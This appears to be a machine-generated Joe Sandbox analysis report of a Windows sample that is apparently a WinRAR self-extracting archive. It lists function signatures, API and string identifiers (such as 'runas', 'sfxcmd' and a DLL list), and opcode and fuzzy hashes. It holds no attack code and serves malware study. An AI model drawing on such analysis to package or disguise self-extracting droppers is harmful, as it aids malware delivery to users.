• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$AddressProc$DirectoryHandleLibraryLoadModuleSystem
• String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
• API String ID: 751436351-2013832382
• Opcode ID: d64c9edb356a7913ecfea325c24345d8ce3223450e70cbc395deec6d173345af
• Instruction ID: 87a44e7c13794fb7f220d19cab1124b2690e05afceb023181999d5c890ba6443
• Opcode Fuzzy Hash: d64c9edb356a7913ecfea325c24345d8ce3223450e70cbc395deec6d173345af
• Instruction Fuzzy Hash: 44626C32A09F8299EB199F60E8401E973A4FF44354F603236DA4D877A5EF7EE644C380
Similarity
• API ID: Item$Message$_invalid_parameter_noinfo_noreturn$Send$DialogText$File$ErrorLast$CloseFindFocusLoadStringViewWindow$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmap
• String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
• API String ID: 255727823-2702805183
• Opcode ID: 325886699d3e479aa83e354952696db83c0ec1c6632f992920f5d98df5c10264
• Instruction ID: 55a511d7344c1b0c427ed163e1fd0de5e4b966cb51fd7ba51f9979efcfe9f56a
• Opcode Fuzzy Hash: 325886699d3e479aa83e354952696db83c0ec1c6632f992920f5d98df5c10264
• Instruction Fuzzy Hash: 53D2F562A0878385EB28DB20E8442F96361EF85784F607136D94DC77E6EF7EE944C790
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$FileMessageMoveSend$DialogItemPathTemp
• String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
• API String ID: 3007431893-3916287355
• Opcode ID: 375db2e0d226c61e0c1990f26411cdcbd7c7140125762ff0400803d08f65cc38
• Instruction ID: 0acf3f8fd782a9c9fe1c79637c6c3555d321b016599c5a41381ece51a9e88e85
• Opcode Fuzzy Hash: 375db2e0d226c61e0c1990f26411cdcbd7c7140125762ff0400803d08f65cc38
• Instruction Fuzzy Hash: 6013C232B04B8289EF18DF64D8402ED27B1FB40398F602536DA5D97AE9DF79D585D380

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$EnvironmentHandleVariableView_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                                                                                                                                                                                                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                                                                                                                                        • API String ID: 3767324925-3710569615
                                                                                                                                                                                                                                                        • Opcode ID: 672bf953df9b2c0ed6fd5d6135e2b8bbf1eb438a14cfe977ab9df65a1aaea397
                                                                                                                                                                                                                                                        • Instruction ID: f57872bc44283689c883aa8cff7e583e63313129078fbb76b0dc95dc3b6b84b6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 672bf953df9b2c0ed6fd5d6135e2b8bbf1eb438a14cfe977ab9df65a1aaea397
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5742D971A18B8285EF08DF24D8442BD63A1FF84B84F606235DA5D876E6EF7ED540D390

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWideswprintf
                                                                                                                                                                                                                                                        • String ID: $%s:$CAPTION
                                                                                                                                                                                                                                                        • API String ID: 2100155373-404845831
                                                                                                                                                                                                                                                        • Opcode ID: 37b82379b4c8609f857ddfdd2aaec8a8c1c03398c79129c67daa6eff71331f07
                                                                                                                                                                                                                                                        • Instruction ID: 23b026c56a59116c89c74e9783efd6402c33c5b566500fd5b59ff5a20da7fa03
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37b82379b4c8609f857ddfdd2aaec8a8c1c03398c79129c67daa6eff71331f07
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE910A36B186418BD71CCF29E8006A9A7A1FBC4784F506535EE4D87B98DF7EE805CB40

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                                                                                                                                                                                                                                        • String ID: PNG
                                                                                                                                                                                                                                                        • API String ID: 3656887471-364855578
                                                                                                                                                                                                                                                        • Opcode ID: 52838de665b1cfca97a252f31006ab2ca50257577933ff1d2f2095c083ed68dc
                                                                                                                                                                                                                                                        • Instruction ID: c9e8e156ce8c914cd0a60792777701238377548d8cb1cab9ca4b157f8790f292
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 52838de665b1cfca97a252f31006ab2ca50257577933ff1d2f2095c083ed68dc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68412422B09B4681EF198B26D894379A3A0EF44BD4F287435CE0DC7794EF7EE4458790

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 474548282-0
                                                                                                                                                                                                                                                        • Opcode ID: 9e2131fdd348412ea29fb79e3f45126eacfe5ffc882fb6d768e47b091ae13561
                                                                                                                                                                                                                                                        • Instruction ID: a7620bd8a13c4c5cd0ea0e076189c23a7cad35b26baca7282a209aacdd6d14a7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e2131fdd348412ea29fb79e3f45126eacfe5ffc882fb6d768e47b091ae13561
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B261E472A08B8685DE188B24E4412BD6361FB857B4F606331EABDC36E9DF7DD544C780
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: c
                                                                                                                                                                                                                                                        • API String ID: 0-112844655
                                                                                                                                                                                                                                                        • Opcode ID: c1e66077c649525df1862831f5d24fee890eb1fa66ff33924af5fad325382aaf
                                                                                                                                                                                                                                                        • Instruction ID: 3a35b45424afca52b95a3cb2d6bb46e4a85890db3d0a03ff1d8eec10fc120ffd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c1e66077c649525df1862831f5d24fee890eb1fa66ff33924af5fad325382aaf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90E1E533A186818BE719CF29D4802AD77A1F78875CF209139DA5993B88DF3DE981CF50
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 5b628a92f811a5eae6f4b0ca0e3bf09709b45c566e4e75254577d1b926f4d6b6
                                                                                                                                                                                                                                                        • Instruction ID: a982e3c7dddab81b7ab5a77e8f2621a5a8a2806f541af097abcdcd5df014c63f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b628a92f811a5eae6f4b0ca0e3bf09709b45c566e4e75254577d1b926f4d6b6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E222E372E0EA5282FA2C8F14985117DA690FF4275CF392135DA5DD76D4EE3FE8018BA0

                                                                                                                                                                                                                                                        Control-flow Graph

[Control-flow graph image not preserved. Function at 7ff6063a5390; API calls on the graph: RaiseException, LoadLibraryExA, GetLastError, FreeLibrary, GetProcAddress.]
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DloadSection$AccessWrite$ExceptionProtectRaiseRelease$AcquireErrorLastLibraryLoad
                                                                                                                                                                                                                                                        • String ID: H
                                                                                                                                                                                                                                                        • API String ID: 282135826-2852464175
                                                                                                                                                                                                                                                        • Opcode ID: 1ba3ac7ad01aad9b5bbf5288423d8bdca45e536d0fe216ed71dd1fdc31554d99
                                                                                                                                                                                                                                                        • Instruction ID: 90f4469d9f6513964bfd329cb6311fa1feb75fc735307b3bfc2d42dc76d02091
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ba3ac7ad01aad9b5bbf5288423d8bdca45e536d0fe216ed71dd1fdc31554d99
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F916A32A15B528AEF08CF65D8442AC73B1BF08798B646435DE0E97B54EF3AE444C780
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF606389254: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF606389389
                                                                                                                                                                                                                                                        • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF60638A375
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF60638A82F
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF60638A835
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60639033C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF606389CBA), ref: 00007FF606390369
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                                                                                                                                                                                                        • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                                                                                                                                                                                        • API String ID: 3629253777-3268106645
                                                                                                                                                                                                                                                        • Opcode ID: 87966f23d4e29822f34e3fcc0e0a882ae27015c9125862882d54e96057c8a0e0
                                                                                                                                                                                                                                                        • Instruction ID: 6ab9c136574e5b3c09c002c848b8b64eea10003c288a2f43579b0ec66599e006
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87966f23d4e29822f34e3fcc0e0a882ae27015c9125862882d54e96057c8a0e0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E62C362A1978299EB18DF28D4442FD6361FF40784FA06132DA4DC7AE5EFBEE545C380

                                                                                                                                                                                                                                                        Control-flow Graph

[Control-flow graph image not preserved. Function at 7ff6063a3030; API calls on the graph: ShellExecuteExW, ShowWindow, CloseHandle, GetExitCodeProcess.]
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID: .exe$.inf$Install$p
                                                                                                                                                                                                                                                        • API String ID: 1054546013-3607691742
                                                                                                                                                                                                                                                        • Opcode ID: 0ccde82e90eecccb9c1d6a00cceea7fcf12badbd4a71c34f7908ccaf6dc484b3
                                                                                                                                                                                                                                                        • Instruction ID: ae0e25b321813ba588994620b1ae76e8de0ab2930e1c4ddece79128023b88900
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ccde82e90eecccb9c1d6a00cceea7fcf12badbd4a71c34f7908ccaf6dc484b3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8FC18B32B1CA4285FF18DB65D9442BD23B1AF85B80F246035DA4EC77A4EF3EE8559380

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3569833718-0
                                                                                                                                                                                                                                                        • Opcode ID: 5ff2d565dfc5db30faf5757a2f3953a4f42f62c0c62e185934d8e45e8a36dc63
                                                                                                                                                                                                                                                        • Instruction ID: 8ee37c24c70e951bd7dcd70a3b106c9263debc331fd25d92991911ede0315f5e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ff2d565dfc5db30faf5757a2f3953a4f42f62c0c62e185934d8e45e8a36dc63
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A411539B1468246F718CF61E800BAE3360EB45B98F646135DD0A87BD4CF7FD9458790

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 2245 7ff60639218c-7ff60639219f call 7ff6063a57cc
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                        • String ID: AES-0017$map/set too long$z01$zip$zipx$zx01
                                                                                                                                                                                                                                                        • API String ID: 909987262-704999473
                                                                                                                                                                                                                                                        • Opcode ID: 279821ddad5ca0a3171316fe86be340fa28ecb032434c2a7f18e4b4bd5f06c06
                                                                                                                                                                                                                                                        • Instruction ID: cd2dd3422bb912572d3d824fd08a2ee0ea4f45db9e6a78f0ab80b0db309bc594
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 279821ddad5ca0a3171316fe86be340fa28ecb032434c2a7f18e4b4bd5f06c06
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10B0122890450EC0D43CA7808C450A40310CB54700FB03C30C31CCFC520D3EB0424243

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3536497005-0
                                                                                                                                                                                                                                                        • Opcode ID: f2a95c046f384fb88cb42bad2343db76857be23356c2a59daf525ee97aa7854a
                                                                                                                                                                                                                                                        • Instruction ID: 923ab4a6aaf9be804d910102bff16ab68ac9288b7d93f22d7cbd631e1650564d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2a95c046f384fb88cb42bad2343db76857be23356c2a59daf525ee97aa7854a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B961F976A1878185E7288B29E54036E67A1F7857B8F202334DF6D83AE5DF7ED054C780

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2092733347-0
                                                                                                                                                                                                                                                        • Opcode ID: 7415bec7d798ad501b197d19bbfbfb4fb824aa0f8bac73e46940edbbb5db9b65
                                                                                                                                                                                                                                                        • Instruction ID: 89bf90f96cae7bf7c29ac993ea95c20b552a53de257a8353d242c57b06723207
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7415bec7d798ad501b197d19bbfbfb4fb824aa0f8bac73e46940edbbb5db9b65
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA311962B10A51DEFB04CFB5D8801AC7770FB18758B64602AEF0EA7A68EF38D595C744

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
• Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID: sfxcmd$sfxpar
                                                                                                                                                                                                                                                        • API String ID: 3540648995-3493335439
                                                                                                                                                                                                                                                        • Opcode ID: 5a57c69db1c650ffc0109058ee75098a0d594147db01f3cd247ccf932cb967a8
                                                                                                                                                                                                                                                        • Instruction ID: 890e6c047d1896581ad0eea8974c8fc778145e776c10daebc527728c20bb8003
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a57c69db1c650ffc0109058ee75098a0d594147db01f3cd247ccf932cb967a8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB316F72E14B5684FF088B69D8841AC6371EB44B98F242135DE5ED7AA9CE39D185C380

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LoadBitmapW.USER32 ref: 00007FF60639EB7A
                                                                                                                                                                                                                                                        • GetObjectW.GDI32 ref: 00007FF60639EBAB
                                                                                                                                                                                                                                                        • DeleteObject.GDI32 ref: 00007FF60639EBE5
                                                                                                                                                                                                                                                        • DeleteObject.GDI32 ref: 00007FF60639EC15
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60639C260: FindResourceExW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00001000,00007FF6063A4517), ref: 00007FF60639C279
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60639C260: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF6063A4517), ref: 00007FF60639C295
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60639C260: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF6063A4517), ref: 00007FF60639C2AF
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60639C260: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF6063A4517), ref: 00007FF60639C2C1
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60639C260: GlobalAlloc.KERNELBASE ref: 00007FF60639C2E2
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60639C260: GlobalLock.KERNEL32 ref: 00007FF60639C2F7
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60639C260: CreateStreamOnHGlobal.COMBASE ref: 00007FF60639C324
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60639C260: GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF60639C3A5
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60639C260: GlobalUnlock.KERNEL32 ref: 00007FF60639C3C8
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60639C260: GlobalFree.KERNEL32 ref: 00007FF60639C3D1
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
• Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                                                                                                                                                        • String ID: ]
                                                                                                                                                                                                                                                        • API String ID: 1797374341-3352871620
                                                                                                                                                                                                                                                        • Opcode ID: 4bf2bc35f3b21ea03de476389abc0e83db34e9447328c44d88c742213a9449e8
                                                                                                                                                                                                                                                        • Instruction ID: e764a1556612846481d70e271ebed92a8bcece19c25f17c55707e67ec2ce9fb4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bf2bc35f3b21ea03de476389abc0e83db34e9447328c44d88c742213a9449e8
